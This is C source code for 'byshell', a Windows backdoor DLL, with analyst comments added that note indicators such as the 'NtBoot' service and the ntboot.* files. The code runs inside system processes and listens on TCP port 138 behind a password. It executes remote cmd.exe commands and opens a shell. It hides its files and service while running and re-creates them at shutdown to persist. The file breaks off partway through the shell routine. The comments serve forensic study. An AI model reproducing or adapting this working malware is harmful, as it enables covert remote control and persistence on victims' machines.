//byshell v0.63DLL,use tcp138 in winlogon.//no,svchost/no,all system process are the same/inj to spoolsv,can be changed to other
//powered 12.19,2004(a long struggle!)
//receive shutdown signal
/*************************************************************
4 ways:
1 SetConsoleCtrlHandler (does not need a message queue)
//1_ but winlogon cannot receive such a signal!!
2 receive WM_QUERYENDSESSION (needs a registered window class and a message queue)
3 setwindowshookex shutdownkey 0xff(need a msg queue but do not receive msg from GetMessage,maybe windows automatically call the CALLBACK)
//2_same code keyhook when inj to a simple process can cause a beep but in winlogon cannot
//2_winlogon cannot use hook,maybe winlogon even cannot use anything related to msg
4 setwindowshookex any process receive wm_queryendsession(same to 3)
****************************************************************/
//experiment:lsass,the same to winlogon
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <string.h>
#pragma comment(lib,"advapi32.lib")
//#include "ntdll.h"
//#include <winuser.h>
#pragma data_seg("abShared")
// --- Shared data segment ("abShared", opened by the #pragma data_seg above) ---
// Every process that maps this DLL sees one copy of these globals, so the state
// below is shared by all hosting processes and all connection threads.
// Analyst note: pwd, buff and the in-memory file copies (memloader/memdll) are
// what a memory-forensics pass over a hosting process would recover.
//
// pwd  : 16-byte authentication prefix; each request must begin with it
//        (strncmp in threadfunc). Default "by"; CmdService overwrites it from
//        ntboot.dat when that file exists, and resume() writes it back to disk.
// buff : the single receive/send buffer shared by every connection (65536 bytes).
char pwd[16]="by";char buff[65536];
// Pipe handles and process information for the interactive shell that work()
// starts on the "shell" command (see the extshell.* assignments in work()).
struct{SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite,cread,cwrite;
STARTUPINFO si;PROCESS_INFORMATION pi;
}extshell;
// State for the "dos" feature. None of these fields are referenced by the code
// visible in this file; the author's value legend follows (field mapping not stated).
struct{char target[256];char dostype;char faketype;int serioustype;HANDLE threadhandle;HANDLE timerhandle;
int pausetime;int seconds;int definemins;WORD attackport;WORD useport;}dos;
//0 not,1 syn,2 tcp//0 nolimit,1 Bclass,2 nofake
// filefp, pbitmapwithoutfileh, sizeimage, packnum: not referenced by the code visible in this file.
HANDLE filefp;HANDLE pbitmapwithoutfileh;DWORD sizeimage;unsigned int packnum=0;//num of pack sent already
// memloader/sizeloader and memdll/sizedll: in-memory copies of ntboot.exe and
// ntboot.dll. CmdService reads both files into these buffers and deletes them
// from disk; resume() writes them back at shutdown time.
// msghook: WH_JOURNALRECORD hook handle set in hookthread, unhooked in several places.
// mainthread: assigned in CmdService; not read anywhere in the code visible here.
void* memloader;void* memdll;int sizeloader;int sizedll;HHOOK msghook;HANDLE mainthread;
#pragma data_seg()
// Exported entry point (presumably invoked by the ntboot.exe loader, which is
// not shown here); hosts the service cleanup and the TCP listener loop. Defined below.
__declspec(dllexport)
DWORD WINAPI CmdService(LPVOID);//real telnetEX server function
// Command dispatcher: interprets the request payload in workbuff (workbufflen
// bytes), carries per-connection state in workflag, reports the reply size
// through *psendlength and returns the new workflag (threadfunc stores it back).
// Defined below.
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength);//return flag,int * psendlength send size
// DllMain does nothing on attach/detach and always reports success; all
// activity starts only when the exported CmdService is invoked.
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{ return TRUE;
}
// CmdService: main routine of the backdoor, run inside whatever process hosts
// this DLL (the header notes talk about injection into system processes).
// Sequence: (1) load the password from <system dir>\ntboot.dat and delete that
// file, (2) stop and delete the "ntboot" service, (3) read ntboot.exe and
// ntboot.dll into memory and delete them from disk, (4) start hookthread so
// resume() re-creates the files and service at shutdown, (5) listen on TCP 138
// on all interfaces and spawn one threadfunc per accepted connection.
// Never returns: both the accept loop and the error path loop via goto.
// Detection notes (values taken from this function): service name "ntboot";
// files ntboot.dat / ntboot.exe / ntboot.dll in the system directory, present
// on disk only briefly at startup and after a shutdown-time resume(); a TCP 138
// listener inside a process that would not normally own one.
__declspec(dllexport)
DWORD WINAPI CmdService(LPVOID lpParam){
int ret;DWORD dwThreadId;DWORD bytesread;char syspath[256];
// The password is kept only in the shared pwd global while running; the
// on-disk copy (ntboot.dat) is read once and then deleted.
GetSystemDirectory(syspath,256);strcat(syspath,"\\ntboot.dat");
HANDLE pwdfp=CreateFile(syspath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(pwdfp==INVALID_HANDLE_VALUE){strcpy(pwd,"by");} // no password file: fall back to the default "by"
else{DWORD bytesread;ReadFile(pwdfp,pwd,16,&bytesread,0);CloseHandle(pwdfp);} // up to 16 raw bytes into pwd
DeleteFile(syspath);
// Remove the loader service and, below, the two files so nothing persists on disk while running.
Sleep(100);
SC_HANDLE schSCManager;
SC_HANDLE schService;
SERVICE_STATUS RemoveServiceStatus;
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
schService=OpenService(schSCManager,"ntboot",SERVICE_ALL_ACCESS);
QueryServiceStatus(schService,&RemoveServiceStatus);
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED){}
else
{
// Ask the service to stop and poll every 10 ms until it leaves STOP_PENDING.
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
}
else
{}
}
DeleteService(schService);
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
Sleep(100);
// Read ntboot.exe into a fresh read/write allocation (memloader/sizeloader), then delete it from disk.
ret=GetSystemDirectory(syspath,256);
HANDLE delfp=CreateFile(strcat(syspath,"\\ntboot.exe"),GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
sizeloader=GetFileSize(delfp,0);memloader=VirtualAlloc(0,sizeloader,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
ReadFile(delfp,memloader,sizeloader,&bytesread,0);CloseHandle(delfp);DeleteFile(syspath);
// Same for ntboot.dll (memdll/sizedll). resume() writes both buffers back at shutdown.
ret=GetSystemDirectory(syspath,256);
delfp=CreateFile(strcat(syspath,"\\ntboot.dll"),GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
sizedll=GetFileSize(delfp,0);memdll=VirtualAlloc(0,sizedll,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
ReadFile(delfp,memdll,sizedll,&bytesread,0);CloseHandle(delfp);DeleteFile(syspath);
//install hook,when shutdown resume two files and the service
//need a thread to interpret the message queue
//no!the msgqueue must be in the same thread of the setwindowshookex
/*A JournalRecordProc hook procedure does not need to live in a dynamic-link library.
A JournalRecordProc hook procedure can live in the application itself.
--MSDN*/
/*
LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam);
//keyhook=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,0,0);1428
msghook=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle(0),0);
//if(!msghook){MessageBox(0,itoa(GetLastError(),syspath,10),0,0);}
DWORD WINAPI msgqueue( LPVOID lpParam );CreateThread(0,0,msgqueue,0,0,&dwThreadId);
*/
// hookthread installs the shutdown triggers (journal hook, console control handler,
// WM_QUERYENDSESSION) that call resume() to re-persist the files and service.
DWORD WINAPI hookthread( LPVOID lpParam );CreateThread(0,0,hookthread,0,0,&dwThreadId);
mainthread=GetCurrentThread(); // stored in the shared segment; not read anywhere visible here
// Network part: pre-load the Winsock stack so its libraries stay available
// even after the loader image is unmapped (author's note, translated).
LoadLibrary("WS2_32.dll");LoadLibrary("wshtcpip.dll");LoadLibrary("WS2HELP.DLL");
LoadLibrary("msafd.dll");// load the required modules, otherwise the needed libraries may be missing after unmapping
// label3 is the restart point used by the error path below: Winsock is
// re-initialised and the listener rebuilt from scratch.
label3: WSADATA WSAData;WSAStartup(MAKEWORD(2,2),&WSAData);
SOCKET socklisten=socket(AF_INET,SOCK_STREAM,0);SOCKET socktcp;
sockaddr_in srvaddr;memset(&srvaddr,0,sizeof(struct sockaddr_in));
srvaddr.sin_family= AF_INET;
srvaddr.sin_port = htons(138); // fixed listening port, all interfaces (INADDR_ANY below)
srvaddr.sin_addr.S_un.S_addr = INADDR_ANY;
ret=bind(socklisten,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr));
if(ret){goto label2;} // bind failed (e.g. port in use): close, wait 1 s, rebuild
if(listen(socklisten,5)==-1){goto label2;}
// Accept loop: an accept that yields 0 or -1 is retried after 250 ms.
label1: while (true){
socktcp= accept(socklisten, 0,0);
if(socktcp!=0 && socktcp!=-1){break;}
Sleep(250);}
//recv4096,send4080
//about Q3: no fixed size packet!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!bad for dir c:\winnt
//11Q,multithread
// One threadfunc per connection; the thread receives the address of this
// function's local socktcp and dereferences it on entry.
dwThreadId=0;DWORD WINAPI threadfunc( LPVOID lpParam );
CreateThread(0, 0, threadfunc, &socktcp, 0, &dwThreadId);
goto label1;
/*while(1){memset(buff,0,65536);recvlen=recv(socktcp,buff,65536,0);
if(strncmp(buff,pwd,strlen(pwd))){closesocket(socktcp);workflag=0;goto label1;}
int sendlength=65520;workflag=work(buff+16,recvlen-16,workflag,&sendlength);
if(sendlength!=send(socktcp,buff+16,sendlength,0)){closesocket(socktcp);workflag=0;goto label1;}
}*/
// Error path: release the listening socket, wait one second and restart from
// label3 (WSAStartup). This function therefore never returns.
label2:
closesocket(socklisten);Sleep(1000);goto label3;
return 0;} // not reached: control always loops back via goto label3
//这个键盘喇叭钩子不是很健壮,经常在工作1,2个小时后罢工??
// WH_JOURNALRECORD hook procedure (installed by hookthread); shutdown trigger #3
// of the header notes. On an HC_ACTION key-down event whose low paramL byte is
// 0xFF it calls resume() to write the files and service back. Every event is
// forwarded to the next hook. The author's note above this function (translated):
// "this keyboard/beep hook is not very robust, it often quits after 1-2 hours of work".
LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam){void resume();
if(code<0){return CallNextHookEx(msghook,code,wParam,lParam);} // negative codes are passed through untouched
if(code==HC_ACTION){
EVENTMSG * pevent=(EVENTMSG *)lParam;
if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0xFF){resume();} // 0xFF: the "shutdown key" named in the header notes
//if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0x42){MessageBeep(0);}
//if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0x41){}
//if(pevent->message==WM_QUERYENDSESSION){DebugBreak();}
}
return CallNextHookEx(msghook,code,wParam,lParam);
}
//i suffer a lot
// Console control handler (installed by hookthread); shutdown trigger #1 of the
// header notes. On CTRL_SHUTDOWN_EVENT it calls resume() to re-persist the files
// and service; every other event is ignored. Always returns 0 (FALSE), i.e. the
// event is not reported as handled.
BOOL WINAPI HandlerRoutine(DWORD dwCtrlType){void resume();
switch(dwCtrlType)
{
case CTRL_SHUTDOWN_EVENT:
resume();
break;
default:
break;
}
return 0;
}
// Worker thread started from CmdService. Installs both shutdown triggers -- the
// WH_JOURNALRECORD hook (JournalRecordProc) and the console control handler
// (HandlerRoutine) -- then pumps a message loop so the hook is serviced, and also
// calls resume() directly when WM_QUERYENDSESSION arrives (trigger #2 of the
// header notes). If either installation fails it shows a MessageBox with the
// GetLastError() code and calls DebugBreak(); a message box or break from a
// system process is itself an anomaly a defender may observe. Unhooks on exit.
DWORD WINAPI hookthread( LPVOID lpParam ){MSG msg;int tmpret;char tmpstr[100];
LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam);
//BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);
msghook=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle(0),0); // handle kept in the shared msghook global
if(!msghook){MessageBox(0,itoa(GetLastError(),tmpstr,10),0,0);DebugBreak();}
tmpret=SetConsoleCtrlHandler(HandlerRoutine,1);
if(!tmpret){MessageBox(0,itoa(GetLastError(),tmpstr,10),0,0);DebugBreak();}
//setwindowshookex(key) need a msg queue but do not receive msg from GetMessage,weird,maybe need a initialize of msg function?
// Message pump: messages are not dispatched, only inspected for WM_QUERYENDSESSION.
while (GetMessage(&msg, NULL, 0, 0)){void resume();
if(msg.message==WM_QUERYENDSESSION){resume();}
//DispatchMessage(&msg);
}
UnhookWindowsHookEx(msghook);
return 0;
}
//resume two files and the service
// Persistence re-arm, called from JournalRecordProc, HandlerRoutine and
// hookthread when a shutdown is detected. Writes back into the system directory
// the three artefacts CmdService removed at startup:
//   ntboot.exe <- memloader (sizeloader bytes)
//   ntboot.dll <- memdll (sizedll bytes)
//   ntboot.dat <- pwd (strlen(pwd) bytes, no terminator)
// then registers an auto-start, interactive, own-process service named "NtBoot"
// (display name "NT Boot Service") whose binary path is the relative string
// "ntboot.exe", and finally removes the console handler and the journal hook so
// the triggers do not run twice.
// Detection: this service name / display name and the three file names
// appearing in the system directory at shutdown time are the durable
// indicators of this sample; while it runs, only the memory state exists.
void resume(){
//HANDLE hhhfp=CreateFile("d:\\aaaaaa",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
//CloseHandle(hhhfp);
char syspath[256];int ret;DWORD bytesread;
ret=GetSystemDirectory(syspath,256);
HANDLE delfp=CreateFile(strcat(syspath,"\\ntboot.exe"),GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(delfp,memloader,sizeloader,&bytesread,0);CloseHandle(delfp); // loader image from memory
ret=GetSystemDirectory(syspath,256);
delfp=CreateFile(strcat(syspath,"\\ntboot.dll"),GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(delfp,memdll,sizedll,&bytesread,0);CloseHandle(delfp); // this DLL's image from memory
ret=GetSystemDirectory(syspath,256);
delfp=CreateFile(strcat(syspath,"\\ntboot.dat"),GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(delfp,pwd,strlen(pwd),&bytesread,0);CloseHandle(delfp); // current password, re-read by CmdService at next start
SC_HANDLE schSCManager;
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
// Service re-creation: name "NtBoot", auto-start, interactive own process, errors ignored at boot.
CreateService(schSCManager,"NtBoot","NT Boot Service",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,"ntboot.exe",NULL,NULL,NULL,NULL,NULL);
SetConsoleCtrlHandler(HandlerRoutine,0);UnhookWindowsHookEx(msghook); // disarm both triggers once persistence is restored
return;
}
// Per-connection worker (one per accepted socket; lpParam points at the
// accepting thread's local SOCKET, copied on entry). Request layout as read here:
// the first strlen(pwd) bytes must equal pwd, a 4-byte total frame length sits at
// offset 28, and the command text starts at offset 32. The reply reuses the same
// frame: work() writes its output at offset 32 and the new total length is
// stored back at offset 28 before the whole frame is sent.
// Receives go into the shared buff (declared with 65536 bytes) with a 66000-byte
// bound, and recv is repeated until the announced length has arrived.
// A wrong prefix or a short send closes the socket and ends the thread with 0.
// The "dettach" command removes the shutdown triggers (console handler and
// journal hook) so resume() will not re-create the files and service, and ends
// the thread with 0xffffffff without closing the socket.
DWORD WINAPI threadfunc( LPVOID lpParam )
{char workflag=0;int recvlen=0;SOCKET socktcp;socktcp=*((SOCKET*)lpParam);
while(1){memset(buff,0,66000);recvlen=recv(socktcp,buff,66000,0);
if(strncmp(buff,pwd,strlen(pwd))){closesocket(socktcp);workflag=0;return 0;}//solve pwd: frame must start with the shared password
int duelen;memcpy(&duelen,buff+28,4); // announced total frame length (native int byte order) at offset 28
while(duelen>recvlen){recvlen+=recv(socktcp,buff+recvlen,66000-recvlen,0);}//solve data division: gather the rest of the frame
int sendlength=65536;
if(!strncmp(buff+32,"dettach",7)){SetConsoleCtrlHandler(HandlerRoutine,0);UnhookWindowsHookEx(msghook);return 0xffffffff;} // disarm persistence triggers; thread ends here
workflag=work(buff+32,duelen-32,workflag,&sendlength); // payload at offset 32; work() writes the reply in place and returns the new workflag
sendlength+=32;memcpy(buff+28,&sendlength,4); // total frame length (header + reply) goes back at offset 28
if(sendlength!=send(socktcp,buff,sendlength,0)){closesocket(socktcp);workflag=0;return 0;}
}
}
//reusable module
//designed for 65536recv max,65520send max,16prefix.
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength)
{//cmd,not check the cmdlog,execute one command and return.
if(workflag==0 && strncmp(workbuff,"cmd",3)==0){
char cmdline[1023]={0};GetSystemDirectory(cmdline,512);strcat(cmdline,"\\cmd.exe /c ");
strncat(cmdline,workbuff+3,1024-strlen(cmdline));
SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite;sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=0;sa.bInheritHandle=1;CreatePipe(&hread,&hwrite,&sa,65536);
STARTUPINFO si;PROCESS_INFORMATION pi;si.cb=sizeof(STARTUPINFO);GetStartupInfo(&si);
si.hStdError=hwrite;si.hStdOutput=hwrite;si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
if(!CreateProcess(0,cmdline,0,0,1,0,0,0,&si,&pi)){
memset(workbuff,0,65520);strcpy(workbuff,"cmd bind error\n");return 0;
}
DWORD bytesread=0;
//3Q sleep1000prevent readfile form miss data,here we cannot send many times.
//still miss data, trys 5000 still.then must on the buffer of the pipe.
//still no result.enlarge the CreatePipe buffter to 65536,success.
//8Q if a cmd has no ret data,eg. "winver",backdoor will block in readfile.use peeknamedpipe to solve this problem.
WaitForSingleObject( pi.hProcess, 10000);
memset(workbuff,0,65520);PeekNamedPipe(hread,0,0,0,&bytesread,0);
if(!bytesread){strcpy(workbuff,"pipe has no ret data\n");*psendlength=strlen(workbuff);return 0;}
ReadFile(hread,workbuff,65520,&bytesread,0);
CloseHandle(hread);CloseHandle(hwrite);*psendlength=bytesread;
return 0;
}
//ok,shell,workflag=1
//start shell
if(workflag==0 && strncmp(workbuff,"shell",5)==0){
char cmdline[1023]={0};GetSystemDirectory(cmdline,512);strcat(cmdline,"\\cmd.exe");
extshell.sa.nLength=sizeof(SECURITY_ATTRIBUTES);
extshell.sa.lpSecurityDescriptor=0;extshell.sa.bInheritHandle=1;
CreatePipe(&extshell.hread,&extshell.hwrite,&extshell.sa,65536);
CreatePipe(&extshell.cread,&extshell.cwrite,&extshell.sa,65536);
extshell.si.cb=sizeof(STARTUPINFO);GetStartupInfo(&(extshell.si));